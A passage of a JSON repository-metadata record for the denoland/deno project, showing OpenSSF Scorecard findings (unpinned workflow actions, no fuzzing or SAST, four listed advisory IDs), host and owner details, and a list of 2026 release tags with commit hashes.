https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denol